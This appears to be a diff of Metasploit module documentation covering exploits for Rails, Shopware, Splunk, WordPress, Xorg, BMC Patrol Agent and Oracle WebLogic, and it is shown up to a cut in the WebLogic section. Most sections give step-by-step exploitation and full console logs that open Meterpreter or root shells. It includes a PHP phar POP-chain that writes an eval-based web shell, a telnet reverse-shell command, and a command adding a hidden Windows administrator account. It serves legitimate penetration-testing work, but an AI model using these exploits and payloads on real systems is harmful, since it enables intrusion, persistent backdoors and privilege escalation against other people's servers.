+Rails.application.routes.draw do
+  resources :metasploit
+end
+```
+
+And finally, start the application (since no mode is specified, by default, it is development mode):
+
+```
+rails s -b 0.0.0.0
+```
+
+## Demonstration
+
+### Server
+
+```
+$ rails server -b 0.0.0.0 
+=> Booting Puma
+=> Rails 5.2.1 application starting in development 
+=> Run `rails server -h` for more startup options
+Puma starting in single mode...
+* Version 3.12.1 (ruby 2.6.0-p0), codename: Llamas in Pajamas
+* Min threads: 5, max threads: 5
+* Environment: development
+* Listening on tcp://0.0.0.0:3000
+Use Ctrl-C to stop
+```
+
+### Metasploit
+
+```
+msf5 exploit(multi/http/rails_double_tap) > check
+[+] 172.16.249.141:3000 - The target is vulnerable.
+msf5 exploit(multi/http/rails_double_tap) > exploit
+
+[*] Started reverse TCP handler on 172.16.249.1:4444 
+[*] Attempting to retrieve the application name...
+[*] The application name is: Demo
+[*] Stager ready: 433 bytes
+[*] Sending serialized payload to target (1250 bytes)
+[*] Sending stage (985320 bytes) to 172.16.249.141
+[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.141:62572) at 2019-04-25 16:29:43 -0500
+[+] Deleted /tmp/LsvSGK.bin
+[+] Deleted /tmp/tSJfp.bin
+
+meterpreter > getuid
+Server username: uid=1000, gid=1000, euid=1000, egid=1000
+meterpreter > pwd
+/home/sinn3r/demo
+meterpreter >
+```
+
@@ -0,0 +1,117 @@
+## Background
+
+Shopware 5 is the next generation of open source e-commerce software made in Germany. Based on bleeding edge technologies like Symfony 3, Doctrine 2 & Zend Framework Shopware comes as the perfect platform for your next e-commerce project. Furthermore Shopware 5 provides an event-driven plugin system and an advanced hook system, giving you the ability to customize every part of the platform..
+
+In the createInstanceFromNamedArguments method, a PHP object instantiation vulnerability was discovered by [@KarimOuerghemmi](https://twitter.com/KarimOuerghemmi) of RIPS who rated the bug as a CVSS 3.6 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) due to the ability of leveraging an XXE primitive. Later on, I bypassed the whitelist patch and found an RCE primitive via PHP object injection. Note that authentication is required to exploit this vulnerability.
+
+This vulnerability is a bypass for CVE-2017-18357 and was tested on Shopware git branches 5.6, 5.5, 5.4, 5.3.
+
+## Vulnerable Application
+
+The following is the exact setup I used to test and analyze the vulnerability:
+
+- Debian GNU/Linux 9 (stretch) x64
+- MariaDB latest
+- Apache2 w/ mod rewrite / PHP 7.2.15 w/ zip, gd, ctype, curl, dom, hash, iconv, json, session, mbstring, simplexml, xml, pdo_mysql and fileinfo
+
+For installation instructions, please refer to the [Shopware installation guide](https://github.com/shopware/shopware#installation-via-git).
+
+## References
+
+- [https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/](https://blog.ripstech.com/2017/shopware-php-object-instantiation-to-blind-xxe/)
+
+## Notes
+
+The recommended CVSS score is 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).
+
+## POP Chain
+
+In order to pivot from an object instantiation bug to a object injection primitive, we need something worth while deserializing:
+
+```php
+<?php
+
+namespace GuzzleHttp\Cookie;
+
+// pop chain
+interface ToArrayInterface {}
+
+class SetCookie implements ToArrayInterface {
+    private $data;
+
+    public function __construct(array $data = []){
+        $this->data = $data;
+    }
+}
+
+class CookieJar implements ToArrayInterface {
+    private $cookies;
+
+    public function setCookie(SetCookie $cookie){
+        $this->cookies = array($cookie);
+    }
+}
+
+class FileCookieJar extends CookieJar {
+    private $filename;
+
+    public function __construct($bd_file){
+        $this->filename = $bd_file;
+        $this->setCookie(new SetCookie(array(
+            "Value" => '<?php eval(base64_decode($_SERVER[HTTP_SI])); ?>',
+            "Expires" => true,
+            "Discard" => false,
+        )));
+    }
+}
+
+$phar = new \Phar('poc.phar');
+$phar->startBuffering();
+$phar->addFromString('test.txt', 'test');
+$phar->setStub('<?php __HALT_COMPILER(); ? >');
+$o = new FileCookieJar("/var/www/html/media/image/si.php");
+$phar->setMetadata($o);
+$phar->stopBuffering();
+?>
+```
+
+## Credit
+
+Steven Seeley (mr_me) of Source Incite
+
+## Demo
+
+```
+saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/shopware.rc 
+[*] Processing scripts/shopware.rc for ERB directives.
+resource (scripts/shopware.rc)> use exploit/multi/http/shopware_createinstancefromnamedarguments_rce
+resource (scripts/shopware.rc)> set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+resource (scripts/shopware.rc)> set LHOST 192.168.23.1
+LHOST => 192.168.23.1
+resource (scripts/shopware.rc)> set RHOSTS 192.168.23.164
+RHOSTS => 192.168.23.164
+resource (scripts/shopware.rc)> set RPORT 8080
+RPORT => 8080
+resource (scripts/shopware.rc)> check
+[+] 192.168.23.164:8080 - The target is vulnerable.
+resource (scripts/shopware.rc)> exploit
+[*] Started reverse TCP handler on 192.168.23.1:4444 
+[+] Stage 1 - logged in with demo: SHOPWAREBACKEND=lpmck6d7nrh23ki2fsgeopci3p;
+[+] Stage 2 - leaked the webroot: /var/www/html
+[+] Stage 3 - leaked the CSRF token: SRJELMCxJfEr2RiMlqS8xmOdidI5Hr
+[+] Stage 4 - generated our phar
+[+] Stage 5 - uploaded phar
+[+] Stage 6 - leaked phar location: media/image/6b/7e/0c/eiuzuoii.jpg
+[+] Stage 7 - triggered object instantiation!
+[*] Sending stage (38247 bytes) to 192.168.23.174
+[*] Meterpreter session 1 opened (192.168.23.1:4444 -> 192.168.23.174:34190) at 2019-05-09 21:11:50 -0500
+[+] Deleted rguktpcw.php
+[+] Deleted image/6b/7e/0c/eiuzuoii.jpg
+
+meterpreter > sysinfo
+Computer    : 45835d649528
+OS          : Linux 45835d649528 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
@@ -0,0 +1,244 @@
+## Vulnerable Application
+
+This module exploits a feature of Splunk whereby a custom application can be
+uploaded through the web based interface. Through the `script` search command a
+user can call commands defined in their custom application which includes arbitrary
+perl or python code. To abuse this behavior, a valid Splunk user with the admin
+role is required. By default, this module uses the credential of "admin:changeme",
+the default Administrator credential for Splunk.
+Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. 
+This module has been tested successfully against:
+
+* 5.0 ([Ubuntu 10.04](https://github.com/rapid7/metasploit-framework/pull/1138#issue-3277564), [Windows XP and Windows Server 2003 SP2](https://github.com/rapid7/metasploit-framework/pull/1138#issue-3277564) with splunk-5.0.1-143156)
+* 6.1, 6.1.1
+* 7.2.4 (OSX 10.14.3, Windows 10 10.0.17134.1, CentOS7 3.10.0-957.1.3.el7.x86_64)
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use exploit/multi/http/splunk_upload_app_exec```
+  3. Set required variables (you will need admin credentials)
+  4. Do: ```SET LHOST [ip]```
+  5. Do: ```SET RHOST [ip]```
+  6. Set a payload: 
+     * If targeting linux or macos the payload ```cmd/unix/reverse_python``` will be automatically selected.
+     * If targeting windows the payload ```cmd/windows/adduser``` will be automatically selected.
+
+  7. You should get either a reverse shell on port 4444 via the predefined handler (Linux/OSX) or a new user in case (windows target)
+
+## External Demo
+* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html) 
+
+* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
+
+* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
+
+## Options
+
+  **EnableOverwrite**
+  Overwrites an app of the same name. Needed if you change the app code in the tgz.
+  Default is `false`
+  
+  **USERNAME**
+  Username for Splunk. Default is `admin`
+  
+  **PASSWORD**
+   Default is `changeme`
+
+## Scenarios
+
+### Tested against 7.2.4 running on OSX 10.14.3
+
+  ```
+msf5 exploit(multi/http/splunk_upload_app_exec) >
+msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1
+RHOST => 172.16.165.1
+msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk
+password => splunksplunk
+msf5 exploit(multi/http/splunk_upload_app_exec) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Automatic
+   1   Splunk >= 7.2.4 / Linux
+   2   Splunk >= 7.2.4 / Windows
+   3   Splunk >= 7.2.4 / OSX
+   4   Splunk >= 5.0.1 / Linux
+   5   Splunk >= 5.0.1 / Windows
+
+
+msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3
+target => 3
+msf5 exploit(multi/http/splunk_upload_app_exec) > exploit
+
+[*] Started reverse TCP double handler on 172.16.165.206:4444
+[*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)'
+[*] Authenticating...
+[*] Fetching state token from /en-US/manager/appinstall/_upload
+[*] Uploading file upload_app_exec.tgz
+[+] upload_app_exec successfully uploaded
+[*] Invoking script command
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo 8kNbt70jYB3aJKPm;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n8kNbt70jYB3aJKPm\r\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100
+  ```
+
+### Tested against splunk-5.0.1-143156 on Ubuntu 10.04
+
+```
+msf > use exploit/multi/http/splunk_upload_app_exec 
+msf  exploit(splunk_upload_app_exec) > show options
+
+Module options (exploit/multi/http/splunk_upload_app_exec):
+
+   Name             Current Setting                                                                         Required  Description
+   ----             ---------------                                                                         --------  -----------
+   PASSWORD         changeme                                                                                yes       The password for the specified username
+   Proxies                                                                                                  no        Use a proxy chain
+   RHOST                                                                                                    yes       The target address
+   RPORT            8000                                                                                    yes       The target port
+   SPLUNK_APP_FILE  /Users/juan/Projects/git/metasploit-framework/data/exploits/splunk/upload_app_exec.tgz  yes       The "rogue" Splunk application tgz
+   USERNAME         admin                                                                                   yes       The username with admin role to authenticate as
+   VHOST                                                                                                    no        HTTP server virtual host
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Splunk 5.0.1 / Linux
+
+
+msf  exploit(splunk_upload_app_exec) > set RHOST 192.168.1.137
+RHOST => 192.168.1.137
+msf  exploit(splunk_upload_app_exec) > rexploit
+[*] Reloading module...
+
+[*] Using command: sh -c '(sleep 4597|telnet 192.168.1.129 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.129 4444 >/dev/null 2>&1 &)'
+[*] Authenticating...
+[*] Started reverse double handler
+[*] Fetching csrf token from /en-US/manager/launcher/apps/local
+[*] Uploading file upload_app_exec.tgz
+[*] upload_app_exec successfully uploaded
+[*] Fetching csrf token from /en-US/app/upload_app_exec/flashtimeline
+[*] Invoking script command
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo uyYJGuNfu2AetK0N;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "uyYJGuNfu2AetK0N\r\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 1 opened (192.168.1.129:4444 -> 192.168.1.137:41432) at 2012-12-07 11:53:35 +0100
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+### Tested against splunk-5.0.1-143156 on Windows XP
+
+```
+msf  exploit(splunk_upload_app_exec) > show targets
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Splunk 5.0.1 / Linux
+   1   Splunk 5.0.1 / Windows
+
+
+msf  exploit(splunk_upload_app_exec) > set target 1
+target => 1
+msf  exploit(splunk_upload_app_exec) > set payload cmd/windows/adduser 
+payload => cmd/windows/adduser
+msf  exploit(splunk_upload_app_exec) > show options
+
+Module options (exploit/multi/http/splunk_upload_app_exec):
+
+   Name             Current Setting                                                                         Required  Description
+   ----             ---------------                                                                         --------  -----------
+   PASSWORD         changeme                                                                                yes       The password for the specified username
+   Proxies                                                                                                  no        Use a proxy chain
+   RHOST            192.168.1.137                                                                           yes       The target address
+   RPORT            8000                                                                                    yes       The target port
+   SPLUNK_APP_FILE  /Users/juan/Projects/git/metasploit-framework/data/exploits/splunk/upload_app_exec.tgz  yes       The "rogue" Splunk application tgz
+   USERNAME         admin                                                                                   yes       The username with admin role to authenticate as
+   VHOST                                                                                                    no        HTTP server virtual host
+
+
+Payload options (cmd/windows/adduser):
+
+   Name    Current Setting  Required  Description
+   ----    ---------------  --------  -----------
+   CUSTOM                   no        Custom group name to be used instead of default
+   PASS    Metasploit$1     yes       The password for this user
+   USER    metasploit       yes       The username to create
+   WMIC    false            yes       Use WMIC on the target to resolve administrators group
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Splunk 5.0.1 / Windows
+
+
+msf  exploit(splunk_upload_app_exec) > rexploit
+[*] Reloading module...
+
+[*] Using command: cmd.exe /c net user metasploit Metasploit$1 /ADD && net localgroup Administrators metasploit /ADD
+[*] Authenticating...
+[*] Fetching csrf token from /en-US/manager/launcher/apps/local
+[*] Uploading file upload_app_exec.tgz
+[*] upload_app_exec successfully uploaded
+[*] Fetching csrf token from /en-US/app/upload_app_exec/flashtimeline
+[*] Invoking script command
+```
+
+After that, on the victim machine:
+
+```
+C:\Documents and Settings\Administrator>net user metasploit
+User name                    metasploit
+Full Name
+Comment
+User's comment
+Country code                 000 (System Default)
+Account active               Yes
+Account expires              Never
+
+Password last set            12/6/2012 11:19 PM
+Password expires             1/18/2013 10:07 PM
+Password changeable          12/6/2012 11:19 PM
+Password required            Yes
+User may change password     Yes
+
+Workstations allowed         All
+Logon script
+User profile
+Home directory
+Last logon                   Never
+
+Logon hours allowed          All
+
+Local Group Memberships      *Administrators       *Users
+Global Group memberships     *None
+The command completed successfully.
+
+
+C:\Documents and Settings\Administrator>
+```
@@ -0,0 +1,58 @@
+On WordPress versions 5.0.0 and <= 4.9.8 it is possible to gain arbitrary code execution via a core vulnerability combining a Path Traversal and a Local File Inclusion.
+An attacker who gains access to an account with at least author privileges on the target can execute PHP code on the remote server.
+
+## Exploitation Steps
+
+1. Upload an image containing PHP code
+2. Edit the `_wp_attached_file` entry from `meta_input` $_POST array to specify an arbitrary path
+3. Perform the Path Traversal by using the `crop-image` Wordpress function
+4. Perform the Local File Inclusion by creating a new WordPress post and set `_wp_page_template` value to the cropped image. The post will `include()` our image containing PHP code.
+
+When visiting the post created by the attacker it is possible to obtain code execudion.
+
+More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/).
+
+## Verification Steps
+
+Confirm that functionality works:
+1. Start `msfconsole`
+2. `use exploit/multi/http/wp_crop_rce`
+3. Set the `RHOST`
+4. Set `USERNAME` and `PASSWORD`
+4. Set `LHOST` and `LPORT`
+5. Run the exploit: `run`
+6. Confirm you have now a meterpreter session
+
+
+## Scenarios
+
+### Ubuntu 18.04 running WordPress 4.9.8
+
+```
+msf5 > use exploit/multi/http/wp_crop_rce
+msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(multi/http/wp_crop_rce) > set username author
+username => author
+msf5 exploit(multi/http/wp_crop_rce) > set password author
+password => author
+msf5 exploit(multi/http/wp_crop_rce) > run
+
+[*] Started reverse TCP handler on 127.0.0.1:4444 
+[*] Authenticating with WordPress using author:author...
+[+] Authenticated with WordPress
+[*] Preparing payload...
+[*] Checking crop library
+[*] Uploading payload
+[+] Image uploaded
+[*] Uploading payload
+[+] Image uploaded
+[*] Including into theme
+[*] Sending stage (38247 bytes) to 127.0.0.1
+[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:36568) at 2019-03-19 11:33:27 -0400
+
+meterpreter > sysinfo
+Computer    : ubuntu
+OS          : Linux ubuntu 4.15.0-46-generic #49-Ubuntu SMP Wed Feb 6 09:33:07 UTC 2019 x86_64
+Meterpreter : php/linux
+```
@@ -1,40 +1,37 @@
 ## Description

-  This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID.  A permission check flaw exists for -modulepath and -logfile options when starting Xorg.  This flaw allows users to write over existing files on the system.  This exploit backs up crontab and then uses -logfile to overwrite it.  A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.        
+  This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID.  A permission check flaw exists for -modulepath and -logfile options when starting Xorg.  This flaw allows users to write over existing files on the system.  This exploit backs up crontab and then uses -logfile to overwrite it.  A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.


 ## Vulnerable Application

-  Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.  
+  Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.

-  Xorg is more restrictive to exploit under CentOS.  The user must have console lock and SeLinux may interfere.  If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.  
+  Xorg is more restrictive to exploit under CentOS / RHEL.  The user must have console lock and SeLinux may interfere.  If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.

  This module has been tested successfully on:

  * OpenBSD 6.3
  * OpenBSD 6.4
+  * CentOS 7.4.1708 x86_64
  * CentOS 7.5.1084 x86_64
+  * Red Hat Enterprise Linux 7.5 x86_64


 ## Verification Steps
-  On CentOS your session must have console lock.  To get a console lock you can login locally with a user.  
+
+  On CentOS/RHEL your session must have console lock.  To get a console lock you can login locally with a user.

  1. Start `msfconsole`
  2. Get a session
  3. Do: `use exploit/multi/local/xorg_x11_suid_server`
-  4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)   
+  4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)
  5. Do: `set SESSION [SESSION]`
  6. Do: `set LHOST [LHOST]`
  7. Do: `run`
  8. You should get a new *root* session


-## Options
-
-  **SESSION**
-
-  Which session to use, which can be viewed with `sessions`
-
 ## Advanced Options

  **Xdisplay**
@@ -43,19 +40,25 @@

  **WritableDir**

-  A writable directory file system path. (default: `/tmp`)
+  A writable directory file system path (default: `/tmp`)

-
-   **ConsoleLock**
+  **ConsoleLock**
   
-  Will check for console lock under linux  (default: `true`)
+  Will check for console lock under linux (default: `true`)


 ## Scenarios

+### OpenBSD
+
 ```
+msf5 > use exploit/multi/local/xorg_x11_suid_server
 msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
 session => 1
+msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2
+lhost => 172.30.0.2
+msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
+verbose => true
 msf5 exploit(multi/local/xorg_x11_suid_server) > run

 [!] SESSION may not be compatible with this module.
@@ -89,3 +92,98 @@ msf5 exploit(multi/local/xorg_x11_suid_server) > run
 id
 uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
 ```
+
+### CentOS 7.4.1708 x86_64
+
+```
+msf5 > use exploit/multi/local/xorg_x11_suid_server
+msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
+session => 1
+msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
+verbose => true
+msf5 exploit(multi/local/xorg_x11_suid_server) > run
+
+[*] Started reverse double SSL handler on 172.16.191.188:4444 
+[*] Running additional check for Linux
+[+] Console lock for user
+[+] Selinux is not an issue
+[+] Xorg path found at /usr/bin/Xorg
+[+] Xorg binary /usr/bin/Xorg is SUID
+[+] Xorg version 1.19.3 is vulnerable
+[!] Xorg in process list
+[!] Could not get version or Xorg process possibly running, may fail
+[+] Passed all initial checks for exploit
+[*] Uploading your payload, this could take a while
+[*] Trying /etc/crontab overwrite
+[+] /etc/crontab overwrite successful
+[*] Waiting on cron to run
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo zk0jobDMxFdBxLBU;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket A
+[*] A: "zk0jobDMxFdBxLBU\n"
+[*] Matching...
+[*] B is input...
+[*] Command shell session 7 opened (172.16.191.188:4444 -> 172.16.191.141:46318) at 2018-11-24 21:31:04 -0500
+[*] Waiting on cron to run
+[+] Returning session after cleaning
+[+] Deleted /tmp/.session-Tafw0iW0r8
+
+id
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
+uname -a
+Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+```
+
+### Red Hat Enterprise Linux 7.5 x86_64
+
+```
+msf5 > use exploit/multi/local/xorg_x11_suid_server
+msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
+session => 1
+msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
+lhost => 172.16.191.165
+msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
+verbose => true
+msf5 exploit(multi/local/xorg_x11_suid_server) > run
+
+[*] Started reverse double SSL handler on 172.16.191.165:4444 
+[*] Running additional check for Linux
+[+] Console lock for user
+[+] Selinux is not an issue
+[+] Xorg path found at /usr/bin/Xorg
+[+] Xorg binary /usr/bin/Xorg is SUID
+[+] Xorg version 1.19.5 is vulnerable
+[!] Xorg in process list
+[!] Could not get version or Xorg process possibly running, may fail
+[+] Passed all initial checks for exploit
+[*] Uploading your payload, this could take a while
+[*] Trying /etc/crontab overwrite
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo EEdPp66R4es6U3WF;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[+] /etc/crontab overwrite successful. Waiting for job to run (may take a minute)...
+[*] Reading from socket B
+[*] B: "EEdPp66R4es6U3WF\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.228:44978) at 2019-04-21 06:29:04 -0400
+[+] Returning session after cleaning
+[+] Deleted /tmp/.session-aqxyug0fH
+
+id
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
+uname -a
+Linux red-hat-7-5-x64.local 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
+cat /etc/redhat-release
+Red Hat Enterprise Linux Server release 7.5 (Maipo)
+```
+
@@ -0,0 +1,94 @@
+## Description
+This module exploits the lack of proper authorization checks in the BMC Patrol Agent that allows arbitrary operating system commands to be executed at a higher privilege level than the user being authenticated. The module is simply a ruby implementation of the remote protocol provided by BMC Patrol Agent to execute system commands.
+
+The vulnerability was identified by Ryan Wincey of [Securifera](https://www.securifera.com/) and was assigned [CVE-2018-20735](https://www.cvedetails.com/cve/CVE-2018-20735/) Further details can be found at the [Securifera website](https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/).
+
+
+## Vulnerable Application
+The module affects the BMC Patrol Agent component of [BMC TrueSight Infrastructure Management](https://docs.bmc.com/docs/TSInfrastructure/113/home-774795879.html). The agent is installed on servers managed using BMC TrueSight Infrastructure Management and listens on TCP port 3181. The vulnerability affects versions up to 11.3.
+
+## Verification Steps
+To use this exploit you will need access to BMC Patrol Agent.
+
+1. Install the BMC Patrol agent on a host.
+2. Ensure that the PatrolAgent service is running and listening on TCP port 3181.
+3. Launch `msfconsole`.
+4. Load the module `use exploit/multi/misc/bmc_patrol_cmd_exec`.
+5. Set the username to authenticate with `set USER patrol`.
+6. Set the password for the user `set PASSWORD password`.
+7. Set the command to execute `set CMD "whoami"`.
+8. Run the exploit `exploit`.
+
+The result should be that the string `nt authority\system` is returned and output.
+
+## Usage Scenarios
+The exploit module contains several targets as detailed below.
+
+### Target 0: Windows Powershell Injected Shellcode
+This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). 
+
+	msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec 
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133
+	RHOSTS => 192.168.162.133
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128
+	LHOST => 192.168.162.128
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set payload windows/meterpreter/reverse_tcp
+	payload => windows/meterpreter/reverse_tcp
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user
+	USER => user
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
+	PASSWORD => password
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j
+	[*] Exploit running as background job 0.
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > 
+	[*] Started reverse TCP handler on 192.168.162.128:4444 
+	[*] 192.168.162.133:3181 - Connected to BMC Patrol Agent.
+	[*] 192.168.162.133:3181 - Successfully authenticated user.
+	[*] Sending stage (179779 bytes) to 192.168.162.133
+	[*] Meterpreter session 1 opened (192.168.162.128:4444 -> 192.168.162.133:58461) at 2019-02-10 23:00:03 -0500
+
+
+### Target 1: Generic Cmd
+This target can be used with *cmd* payloads to execute operating system commands against the target host.
+
+	msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec 
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.130
+	RHOSTS => 192.168.162.130
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128
+	LHOST => 192.168.162.128
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER patrol
+	USER => patrol
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
+	PASSWORD => password
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set TARGET 1
+	TARGET => 1
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PAYLOAD cmd/unix/reverse_netcat
+	PAYLOAD => cmd/unix/reverse_netcat
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j
+	[*] Exploit running as background job 0.
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > 
+	[*] Started reverse TCP handler on 192.168.162.128:4444 
+	[*] 192.168.162.130:3181 - Connected to BMC Patrol Agent.
+	[*] 192.168.162.130:3181 - Successfully authenticated user.
+	[*] Command shell session 1 opened (192.168.162.128:4444 -> 192.168.162.130:57408) at 2019-02-10 23:05:12 -0500
+
+
+### Target Cmd Execution: Windows/Unix/Linux
+This target isn't a formal target. It was added to allow a user to execute commands entirely through the Patrol Agent remote administration feature and view the output. It would be the most quiet of the targets as it does not create any additional connections or use powershell by default like Target 0.
+	
+	msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133
+	RHOSTS => 192.168.162.133
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user
+	USER => user
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
+	PASSWORD => password
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set CMD whoami
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit
+	[*] 192.168.162.133:3181 - Connected to BMC Patrol Agent.
+	[*] 192.168.162.133:3181 - Successfully authenticated user.
+	[*] 192.168.162.133:3181 - Command to execute: whoami
+	[*] 192.168.162.133:3181 - Output:
+	nt authority\system
+
+
@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+
+CVE-2017-10271 exploits an XML deserialization vulnerability in Oracle WebLogic via the AsyncResponseService component.  The exploit provides an unauthenticated attacker with remote arbitrary command execution.
+
+Oracle Weblogic runs as a Java-based service in Windows, Linux, and Unix environments.  It is downloadable from Oracle once registered for an account.  For testing vulnerable environments, we used Weblogic 10.3.6 for Ubuntu (`wls1036_linux32.bin`), Weblogic 10.3.6 for Windows (`wls1036_dev.zip`).  For testing a non-vulnerable environment, we used Weblogic 12.2.1.2 (`fmw_12.2.1.2.0_wls.jar`) in combination with a JDK (`jdk-8u211-windows-x64.exe`).
+
+## Verification Steps
+
+#### Install the application
+  1. Install the application using the binaries above, with both a WebLogic server and an admin server.
+  2. When prompted, name the project `base_domain`.
+  3. When prompted, use a development environment instead of a production environment.
+  4. When prompted, keep the default port of TCP/7001.
+  5. When prompted, provide a username and password, and make a note of them.
+  6. Upon completion of the installer, find and execute the admin server.  On Windows: `C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\startWebLogic.cmd`.  On Linux: `~/Oracle/Middleware/user_projects/base_domain/bin/startWebLogic.sh`
+  7. You may be prompted for the username and password you generated during the install process.
+  8. Wait for the output: `<Server state changed to RUNNING.>`
+
+#### Checking for the vulnerability
+  1. Start msfconsole
+  2. `use exploit/multi/misc/weblogic_deserialize_asyncresponseservice`
+  3. Configure RHOSTS to the target address, and set RPORT if the default port is not being used.
+  4. Run the `check` method to confirm exploitability.
+  5. Look for the following output:
+
+```
+msf5 exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
+[+] 172.16.135.128:8088 - The target is vulnerable.
+```
+
+#### Exploiting the vulnerability
+  1. Follow the steps in the previous "checking" section.
+  2. Set the operating system of the target (eg. `set TARGET Windows`)
+  3. Configure the payload and payload parameters.
+  4. `run`
+
+## Options
+
